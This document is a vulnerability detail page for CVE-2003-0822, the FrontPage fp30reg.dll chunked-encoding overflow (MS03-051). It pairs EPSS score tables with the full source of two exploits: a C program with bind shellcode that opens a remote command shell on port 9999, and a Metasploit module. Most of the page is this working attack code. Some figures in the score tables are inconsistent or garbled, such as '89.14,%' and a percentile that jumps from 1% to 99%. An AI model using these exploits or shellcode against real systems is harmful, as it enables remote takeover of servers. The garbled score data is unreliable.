CVE-2003-0822 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	91.86%	–	–
2023-03-12	–	–	–	97.14%	–
2023-05-28	–	–	–	97.17%	–
2023-12-03	–	–	–	97.04%	–
2024-04-28	–	–	–	97.1%	–
2024-06-02	–	–	–	97.1%	–
2024-09-15	–	–	–	97%	–
2024-12-22	–	–	–	96.9%	–
2025-01-19	–	–	–	96.9%	–
2025-03-18	–	–	–	–	89.07%
2025-03-30	–	–	–	–	89.14%
2025-04-15	–	–	–	–	89.14%
2025-04-15	–	–	–	–	89.14,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	1%
2023-05-28	1%
2023-12-03	1%
2024-04-28	1%
2024-06-02	1%
2024-09-15	1%
2024-12-22	1%
2025-01-19	1%
2025-03-18	1%
2025-03-30	1%
2025-04-15	99%
2025-04-15	99%

/******************************************************************************* Frontpage fp30reg.dll Overflow (MS03-051) discovered by Brett Moore Exploit by Adik netmaniac hotmail kg Binds persistent command shell on port 9999 Tested on Windows 2000 Professional SP3 English version (fp30reg.dll ver 4.0.2.5526) -[ 13/Nov/2003 ]- ********************************************************************************/ #include <stdio.h> #include <string.h> #include <winsock.h> #pragma comment(lib,"ws2_32") #define VER "0.1" /******** bind shellcode spawns persistent shell on port 9999 *****************************/ unsigned char kyrgyz_bind_code[] = { 0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33, 0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA, 0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88 }; void cmdshell (int sock); long gimmeip(char *hostname); int main(int argc,char *argv[]) { WSADATA wsaData; struct sockaddr_in targetTCP; struct hostent *host; int sockTCP,s; unsigned short port = 80; long ip; unsigned char header[]= "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n"; unsigned char packet[3000],data[1500]; unsigned char ecx[] = "\xe0\xf3\xd4\x67"; unsigned char edi[] = "\xff\xd0\x90\x90"; unsigned char call[] = "\xe4\xf3\xd4\x67";//overwrite .data section of fp30reg.dll unsigned char shortjmp[] = "\xeb\x10"; printf("\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n" " by Adik < netmaniac [at] hotmail.KG >\n\n", VER); if(argc < 2) { printf(" Usage: %s [Target] <port>\n" " eg: fp30reg.exe 192.168.63.130\n\n",argv[0]); return 1; } if(argc==3) port = atoi(argv[2]); WSAStartup(0x0202, &wsaData); printf("[*] Target:\t%s \tPort: %d\n\n",argv[1],port); ip=gimmeip(argv[1]); memset(&targetTCP, 0, sizeof(targetTCP)); memset(packet,0,sizeof(packet)); targetTCP.sin_family = AF_INET; targetTCP.sin_addr.s_addr = ip; targetTCP.sin_port = htons(port); sprintf(packet,"%sHost: %s\r\nTransfer-Encoding: chunked\r\n",header,argv[1]); memset(data, 0x90, sizeof(data)-1); data[sizeof(data)-1] = '\x0'; memcpy(&data[16],edi,sizeof(edi)-1); memcpy(&data[20],ecx,sizeof(ecx)-1); memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1); memcpy(&data[250+14],call,sizeof(call)-1); memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code)); sprintf(packet,"%sContent-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",packet,strlen(data),strlen(data),data); if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("[x] Socket not initialized! Exiting...\n"); WSACleanup(); return 1; } printf("[*] Socket initialized...\n"); if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0) { printf("[*] Connection to host failed! Exiting...\n"); WSACleanup(); exit(1); } printf("[*] Checking for presence of fp30reg.dll..."); if (send(sockTCP, packet, strlen(packet),0) == -1) { printf("[x] Failed to inject packet! Exiting...\n"); WSACleanup(); return 1; } memset(packet,0,sizeof(packet)); if (recv(sockTCP, packet, sizeof(packet),0) == -1) { printf("[x] Failed to receive packet! Exiting...\n"); WSACleanup(); return 1; } if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0') printf(" Found!\n"); else { printf(" Not Found!! Exiting...\n"); WSACleanup(); return 1; } printf("[*] Packet injected!\n"); closesocket(sockTCP); printf("[*] Sleeping "); for(s=0;s<13000;s+=1000) { printf(". "); Sleep(1000); } printf("\n[*] Connecting to host: %s on port 9999",argv[1]); if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("\n[x] Socket not initialized! Exiting...\n"); WSACleanup(); return 1; } targetTCP.sin_family = AF_INET; targetTCP.sin_addr.s_addr = ip; targetTCP.sin_port = htons(9999); if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0) { printf("\n[x] Exploit failed or there is a Firewall! Exiting...\n"); WSACleanup(); exit(1); } printf("\n[*] Dropping to shell...\n\n"); cmdshell(sockTCP); return 0; } /*********************************************************************************/ void cmdshell (int sock) { struct timeval tv; int length; unsigned long o[2]; char buffer[1000]; tv.tv_sec = 1; tv.tv_usec = 0; while (1) { o[0] = 1; o[1] = sock; length = select (0, (fd_set *)&o, NULL, NULL, &tv); if(length == 1) { length = recv (sock, buffer, sizeof (buffer), 0); if (length <= 0) { printf ("[x] Connection closed.\n"); WSACleanup(); return; } length = write (1, buffer, length); if (length <= 0) { printf ("[x] Connection closed.\n"); WSACleanup(); return; } } else { length = read (0, buffer, sizeof (buffer)); if (length <= 0) { printf("[x] Connection closed.\n"); WSACleanup(); return; } length = send(sock, buffer, length, 0); if (length <= 0) { printf("[x] Connection closed.\n"); WSACleanup(); return; } } } } /*********************************************************************************/ long gimmeip(char *hostname) { struct hostent *he; long ipaddr; if ((ipaddr = inet_addr(hostname)) < 0) { if ((he = gethostbyname(hostname)) == NULL) { printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname); WSACleanup(); exit(1); } memcpy(&ipaddr, he->h_addr, he->h_length); } return ipaddr; } /*********************************************************************************/ // milw0rm.com [2003-11-13]

## # $Id: ms03_051_fp30reg_chunked.rb 9929 2010-07-25 21:37:54Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow', 'Description' => %q{ This is an exploit for the chunked encoding buffer overflow described in MS03-051 and originally reported by Brett Moore. This particular modules works against versions of Windows 2000 between SP0 and SP3. Service Pack 4 fixes the issue. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9929 $', 'References' => [ [ 'CVE', '2003-0822'], [ 'OSVDB', '2952'], [ 'BID', '9007'], [ 'MSB', 'MS03-051'], ], 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ ['Windows 2000 SP0-SP3', { 'Ret' => 0x6c38a4d0 }], # from mfc42.dll ['Windows 2000 07/22/02', { 'Ret' => 0x67d44eb1 }], # from fp30reg.dll 07/22/2002 ['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d }], # from fp30reg.dll 10/06/1999 ], 'DisclosureDate' => 'Nov 11 2003', 'DefaultTarget' => 0)) register_options( [ OptString.new('URL', [ true, "The path to fp30reg.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]), ], self.class) end def exploit print_status("Creating overflow request for fp30reg.dll...") pat = rand_text_alphanumeric(0xdead) pat[128, 4] = [target.ret].pack('V') pat[264, 4] = [target.ret].pack('V') # sub eax,0xfffffeff; jmp eax pat[160, 7] = "\x2d\xff\xfe\xff\xff" + "\xff\xe0" pat[280, 512] = make_nops(512) pat[792, payload.encoded.length] = payload.encoded 0.upto(15) do |i| if (i % 3 == 0) print_status("Refreshing the remote dllhost.exe process...") res = send_request_raw({ 'uri' => datastore['URL'] }, -1) if (res and res.body =~ /specified module could not be found/) print_status("The server states that #{datastore['URL']} does not exist.\n") return end end print_status("Trying to exploit fp30reg.dll (request #{i} of 15)") res = send_request_raw({ 'uri' => datastore['URL'], 'method' => 'POST', 'headers' => { 'Transfer-Encoding' => 'Chunked' }, 'data' => "DEAD\r\n#{pat}\r\n0\r\n" }, 5) if (res and res.body =~ /specified module could not be found/) print_status("The server states that #{datastore['URL']} does not exist.\n") return end handler select(nil,nil,nil,1) end end def check print_status("Requesting the vulnerable ISAPI path...") r = send_request_raw({ 'uri' => datastore['URL'] }, -1) if (r and r.code == 501) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end end